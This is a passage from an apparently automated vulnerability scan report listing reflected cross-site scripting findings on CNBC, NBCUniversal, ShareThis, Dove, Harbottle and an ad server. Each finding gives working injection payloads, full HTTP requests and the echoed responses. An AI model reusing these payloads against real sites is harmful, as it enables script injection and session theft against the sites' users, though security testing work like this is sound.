Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; adops_master_kvs=; snas_noinfo=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:51 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 84839
X-Aicache-OS: 64.210.193.97:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:51 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss8364e</title><
...[SNIP]...
<title>xss8364e</title><script>alert(1)</script>07d9d84cea13b502c - CNBC</title>
...[SNIP]...

3.68. http://search.cnbc.com/main.do [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the keywords request parameter is copied into the HTML document as text between TITLE tags. The payload fda4e</title><script>alert(1)</script>b2e6faa4271 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main.do?keywords=xssfda4e</title><script>alert(1)</script>b2e6faa4271&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:54 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85227
X-Aicache-OS: 64.210.194.245:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:54 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xssfda4e</title><
...[SNIP]...
<title>xssfda4e</title><script>alert(1)</script>b2e6faa4271 - CNBC</title>
...[SNIP]...

3.69. http://search.cnbc.com/main.do [pubfreq parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the pubfreq request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf8c"><script>alert(1)</script>c96a087baf9 was submitted in the pubfreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main.do?keywords=xss&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h8cf8c"><script>alert(1)</script>c96a087baf9 HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:59 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85676
X-Aicache-OS: 64.210.194.246:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:59 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
e="keywords" type="text" style="width:100px" height="22px" class="search_input" onkeypress="javascript: return cnbc_searchbox_submitenter(document.getElementById('txtBox').value,'date',formatParam,0,'h8cf8c"><script>alert(1)</script>c96a087baf9',event);" maxlength="100"/>
...[SNIP]...

3.70. http://search.cnbc.com/main.do [pubfreq parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the pubfreq request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f82d"%3balert(1)//40cf5dbf8a was submitted in the pubfreq parameter. This input was echoed as 4f82d";alert(1)//40cf5dbf8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.do?keywords=xss&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h4f82d"%3balert(1)//40cf5dbf8a HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:58:00 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85436
X-Aicache-OS: 64.210.194.247:80
Connection: close
Expires: Tue, 06 Sep 2011 15:08:00 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
<script>
search_GetPagination_Clientside(0,search_PagLinks,linksdisplay,keyWordParam,1,"date",formatParam,0,"h4f82d";alert(1)//40cf5dbf8a");
display_searchPageResults(0,10,1,keyWordParam);
</script>
...[SNIP]...

3.71. http://search.cnbc.com/main.do [sort parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the sort request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa5fc"%3balert(1)//d4e309e7b5c was submitted in the sort parameter. This input was echoed as aa5fc";alert(1)//d4e309e7b5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.do?keywords=xss&sort=dateaa5fc"%3balert(1)//d4e309e7b5c&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:57 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85675
X-Aicache-OS: 64.210.194.247:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:57 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
<script>
search_GetPagination_Clientside(0,search_PagLinks,linksdisplay,keyWordParam,1,"dateaa5fc";alert(1)//d4e309e7b5c",formatParam,0,"h");
display_searchPageResults(0,10,1,keyWordParam);
</script>
...[SNIP]...

3.72. http://search.cnbc.com/main.do [sort parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the sort request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87310"><script>alert(1)</script>44b2f4d8132 was submitted in the sort parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main.do?keywords=xss&sort=date87310"><script>alert(1)</script>44b2f4d8132&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:55 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 86020
X-Aicache-OS: 64.210.194.246:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:55 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
ut id="txtBox" name="keywords" type="text" style="width:100px" height="22px" class="search_input" onkeypress="javascript: return cnbc_searchbox_submitenter(document.getElementById('txtBox').value,'date87310"><script>alert(1)</script>44b2f4d8132',formatParam,0,'h',event);" maxlength="100"/>
...[SNIP]...

3.73. http://serve.directdigitalllc.com/serve.php [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7792f"><script>alert(1)</script>5f008c5eb4 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=7792f"><script>alert(1)</script>5f008c5eb4 HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:16:07 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9750

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
wn;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=7792f"><script>alert(1)</script>5f008c5eb4https://crm.directdigitalllc.com/click?a=76&b=26&p=76%2C17%2C104&t=11">
...[SNIP]...

3.74. http://serve.directdigitalllc.com/serve.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24c33"><script>alert(1)</script>ea769a6fa16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?/24c33"><script>alert(1)</script>ea769a6fa16trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:16:07 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9778

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
known;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?/24c33"><script>alert(1)</script>ea769a6fa16trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=76%2C104%2C125&t=11">
...[SNIP]...

3.75. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 26c64<script>alert(1)</script>321541649f9 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback26c64<script>alert(1)</script>321541649f9 HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:00:57 GMT
Content-Length: 208
Content-Type: text/html

__nbcsnasadops.doSCallback26c64<script>alert(1)</script>321541649f9({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]"}});

3.76. http://wd.sharethis.com/api/getCount2.php [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e05fc%3balert(1)//177df2a42e6 was submitted in the cb parameter. This input was echoed as e05fc;alert(1)//177df2a42e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/getCount2.php?cb=stButtons.processCBe05fc%3balert(1)//177df2a42e6&url=http%3A%2F%2Fwww.tenzing.com%2Fatg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 15:32:13 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 277

(function(){stButtons.processCBe05fc;alert(1)//177df2a42e6({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.tenzing.com\/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_
...[SNIP]...

3.77. http://www.dove.us/Products/Hair/ [ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dove.us
Path:   /Products/Hair/

Issue detail

The value of the ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41eb5"><script>alert(1)</script>fe65f901e8 was submitted in the ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=41eb5"><script>alert(1)</script>fe65f901e8 HTTP/1.1
Host: www.dove.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1
Cookie: ASP.NET_SessionId=p00w4n55ylvqfa45ehz13x45

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 29750
Date: Tue, 06 Sep 2011 16:53:45 GMT
Connection: close

<!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/> <![endif]-->
<!--[if IE 7 ]> <html l
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?app_id=165670856825683&amp;href=http://www.dove.us/Products/Hair/default.aspx?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=41eb5"><script>alert(1)</script>fe65f901e8&amp;
   send=false&amp;layout=button_count&amp;width=140&amp;show_faces=true&amp;action=recommend&amp;colorscheme=light&amp;font=arial&amp;
   height=21" title="Recommend" scrolling="no" frameborder="0"
...[SNIP]...

3.78. http://www.dove.us/Products/Hair/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dove.us
Path:   /Products/Hair/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba088"><script>alert(1)</script>d91bc007f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Products/Hair/?ba088"><script>alert(1)</script>d91bc007f7=1 HTTP/1.1
Host: www.dove.us
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 29548
Date: Tue, 06 Sep 2011 16:45:50 GMT
Connection: close

<!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/> <![endif]-->
<!--[if IE 7 ]> <html l
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?app_id=165670856825683&amp;href=http://www.dove.us/Products/Hair/default.aspx?ba088"><script>alert(1)</script>d91bc007f7=1&amp;
   send=false&amp;layout=button_count&amp;width=140&amp;show_faces=true&amp;action=recommend&amp;colorscheme=light&amp;font=arial&amp;
   height=21" title="Recommend" scrolling="no" frameborder="
...[SNIP]...

3.79. http://www.harbottle.com/hnl/pages/hnl_search2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 353c3><img%20src%3da%20onerror%3dalert(1)>9d536909165a5febf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 353c3><img src=a onerror=alert(1)>9d536909165a5febf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /hnl/pages/hnl_search2.php/353c3><img%20src%3da%20onerror%3dalert(1)>9d536909165a5febf?search=xss HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl.php?gclid=
Cache-Control: max-age=0
Origin: http://www.harbottle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:52 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5158
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/353c3><img src=a onerror=alert(1)>9d536909165a5febf.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.80. http://www.harbottle.com/hnl/pages/hnl_search2.php [search parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php

Issue detail

